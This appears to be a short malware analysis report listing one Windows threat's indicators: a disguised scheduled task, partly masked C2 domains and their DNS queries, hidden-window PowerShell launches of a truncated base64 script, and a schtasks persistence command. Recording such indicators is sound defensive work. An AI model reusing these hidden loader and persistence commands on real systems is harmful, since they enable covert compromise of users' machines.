Technical information
- <SYSTEM32>\tasks\windowsapplicationservice
- 'z2###da2mjc.top':80
- DNS ASK z2###da2mjc.top
- DNS ASK z2###da3mjc.top
- DNS ASK nm###da3mjc.top
- DNS ASK c3###da3mjc.top
- DNS ASK rl###da3mjc.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHRjemRhYmZ5ZnYgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoIC...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHRjemRhYmZ5ZnYgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoIC...
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 10 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs